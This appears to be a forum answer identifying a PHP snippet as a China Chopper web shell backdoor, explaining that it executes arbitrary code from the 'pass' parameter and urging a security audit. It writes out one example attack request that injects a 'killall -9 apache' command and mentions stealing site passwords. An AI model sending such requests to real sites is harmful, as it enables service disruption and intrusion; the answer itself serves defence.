Yes, it is very bad. I can't imagine any situation where this code could exist as the part of a harmless software.

This code essentially allows to run any php code given by the pass get parameter. For example, calling this php as http://yoursite/your.php?pass=system("killall -9 apache"); will shot down your webserver. But it is usable for anything (including overwriting / extending your existing scripts to save the site passwords in a temporary file. And later to get this temporary file back).

It is probably a backdoor, and probably not the only one. Your site needs a deep security check.

This PHP script belongs to China Chopper Hacking Kit.

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html